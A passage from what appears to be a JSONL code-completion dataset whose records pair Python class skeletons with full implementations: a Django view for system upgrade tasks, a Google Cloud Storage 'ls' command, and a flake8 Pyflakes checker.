upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "class_docstring": "升级处理", "class_name": "SystemUpgradeList", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000197", "length_bytes": 15651, "license_type": "no_license", "methods": [{"docstring": "升级列表 :param request: :return:", "name": "get", "signature": "def get(self, request)"}, {"docstring": "添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:", "name": "post", "signature": "def post(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006524", "prompt": "Implement the Python class `SystemUpgradeList` described below.\n\nClass description:\n升级处理\n\nMethod signatures and docstrings:\n- def get(self, request): 升级列表 :param request: :return:\n- def post(self, request): 添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:", "prompted_full_text": "Implement the Python class `SystemUpgradeList` described below.\n\nClass description:\n升级处理\n\nMethod signatures and docstrings:\n- def get(self, request): 升级列表 :param request: :return:\n- def post(self, request): 添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\n\n<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "revision_id": "d6e025d7e9d9e3aecfd399c77f376130edd8a2df", "skeleton": "<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n", "source": "the_stack_v2_python_sparse", "source_path": "soc_system/views/upgrade_views.py", "source_repo": "sundw2015/841", "split": "test", "star_events_count": 4} {"blob_id": "1f18aad35e93fee69c0335d3a5a23feedae1e087", "bodies": ["parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\nparser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\nparser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\nparser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\nparser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\nparser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\nparser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\noutput_styles = parser.add_group(mutex='True')\noutput_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\noutput_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\noutput_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\nflags.add_additional_headers_flag(parser)\nflags.add_encryption_flags(parser, command_only_reads_data=True)\nflags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)", "encryption_util.initialize_key_store(args)\nuse_gsutil_style = flags.check_if_use_gsutil_style(args)\nfound_non_default_provider = False\nif args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\nelse:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\nif args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\nelif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\nelif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\nelse:\n display_detail = ls_command_util.DisplayDetail.SHORT\nls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\nif found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')"], "bodies_text": "<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "class_docstring": "List Cloud Storage buckets and objects.", "class_name": "Ls", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000198", "length_bytes": 8020, "license_type": "permissive", "methods": [{"docstring": "Edit argparse.ArgumentParser for the command.", "name": "Args", "signature": "def Args(parser)"}, {"docstring": "Command execution logic.", "name": "Run", "signature": "def Run(self, args)"}], "n_methods": 2, "prompt": "Implement the Python class `Ls` described below.\n\nClass description:\nList Cloud Storage buckets and objects.\n\nMethod signatures and docstrings:\n- def Args(parser): Edit argparse.ArgumentParser for the command.\n- def Run(self, args): Command execution logic.", "prompted_full_text": "Implement the Python class `Ls` described below.\n\nClass description:\nList Cloud Storage buckets and objects.\n\nMethod signatures and docstrings:\n- def Args(parser): Edit argparse.ArgumentParser for the command.\n- def Run(self, args): Command execution logic.\n\n<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n<|end_body_1|>\n", "revision_id": "392abf004b16203030e6efd2f0af24db7c8d669e", "skeleton": "<|skeleton|>\nclass Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Ls:\n \"\"\"List Cloud Storage buckets and objects.\"\"\"\n\n def Args(parser):\n \"\"\"Edit argparse.ArgumentParser for the command.\"\"\"\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n\n def Run(self, args):\n \"\"\"Command execution logic.\"\"\"\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\n else:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\n if args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\n elif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\n elif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\n else:\n display_detail = ls_command_util.DisplayDetail.SHORT\n ls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\n if found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/surface/storage/ls.py", "source_repo": "google-cloud-sdk-unofficial/google-cloud-sdk", "split": "test", "star_events_count": 9} {"blob_id": "d50131fd4f3e378cc4ed773a7329192382337942", "bodies": ["filename = utils.normalize_paths(filename)[0]\nwith_doctest = self.with_doctest\nincluded_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\nif included_by:\n with_doctest = True\nfor exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\nsuper(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)", "parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\nparser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\nparser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\nparser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')", "if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\ncls.with_doctest = options.doctests\nincluded_files = []\nfor included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\ncls.include_in_doctest = utils.normalize_paths(included_files)\nexcluded_files = []\nfor excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\ncls.exclude_from_doctest = utils.normalize_paths(excluded_files)\ninc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\nif inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)", "for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)"], "bodies_text": "<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = False\n overlaped_by = [include for include in included_by if include.startswith(exclude)]\n if overlaped_by:\n with_doctest = True\n super(FlakesChecker, self).__init__(tree, filename, withDoctest=with_doctest)\n<|end_body_0|>\n\n<|body_start_1|>\n parser.add_option('--builtins', parse_from_config=True, comma_separated_list=True, help='define more built-ins, comma separated')\n parser.add_option('--doctests', default=False, action='store_true', parse_from_config=True, help='check syntax of the doctests')\n parser.add_option('--include-in-doctest', default='', dest='include_in_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Run doctests only on these files', type='string')\n parser.add_option('--exclude-from-doctest', default='', dest='exclude_from_doctest', parse_from_config=True, comma_separated_list=True, normalize_paths=True, help='Skip these files when running doctests', type='string')\n<|end_body_1|>\n\n<|body_start_2|>\n if options.builtins:\n cls.builtIns = cls.builtIns.union(options.builtins)\n cls.with_doctest = options.doctests\n included_files = []\n for included_file in options.include_in_doctest:\n if included_file == '':\n continue\n if not included_file.startswith((os.sep, './', '~/')):\n included_files.append('./' + included_file)\n else:\n included_files.append(included_file)\n cls.include_in_doctest = utils.normalize_paths(included_files)\n excluded_files = []\n for excluded_file in options.exclude_from_doctest:\n if excluded_file == '':\n continue\n if not excluded_file.startswith((os.sep, './', '~/')):\n excluded_files.append('./' + excluded_file)\n else:\n excluded_files.append(excluded_file)\n cls.exclude_from_doctest = utils.normalize_paths(excluded_files)\n inc_exc = set(cls.include_in_doctest).intersection(cls.exclude_from_doctest)\n if inc_exc:\n raise ValueError('\"%s\" was specified in both the include-in-doctest and exclude-from-doctest options. You are not allowed to specify it in both for doctesting.' % inc_exc)\n<|end_body_2|>\n\n<|body_start_3|>\n for message in self.messages:\n col = getattr(message, 'col', 0)\n yield (message.lineno, col, message.flake8_msg % message.message_args, message.__class__)\n<|end_body_3|>\n", "class_docstring": "Subclass the Pyflakes checker to conform with the flake8 API.", "class_name": "FlakesChecker", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FlakesChecker:\n \"\"\"Subclass the Pyflakes checker to conform with the flake8 API.\"\"\"\n\n def __init__(self, tree, filename):\n \"\"\"Initialize the PyFlakes plugin with an AST tree and filename.\"\"\"\n <|body_0|>\n\n def add_options(cls, parser):\n \"\"\"Register options for PyFlakes on the Flake8 OptionManager.\"\"\"\n <|body_1|>\n\n def parse_options(cls, options):\n \"\"\"Parse option values from Flake8's OptionManager.\"\"\"\n <|body_2|>\n\n def run(self):\n \"\"\"Run the plugin.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filename = utils.normalize_paths(filename)[0]\n with_doctest = self.with_doctest\n included_by = [include for include in self.include_in_doctest if include != '' and filename.startswith(include)]\n if included_by:\n with_doctest = True\n for exclude in self.exclude_from_doctest:\n if exclude != '' and filename.startswith(exclude):\n with_doctest = 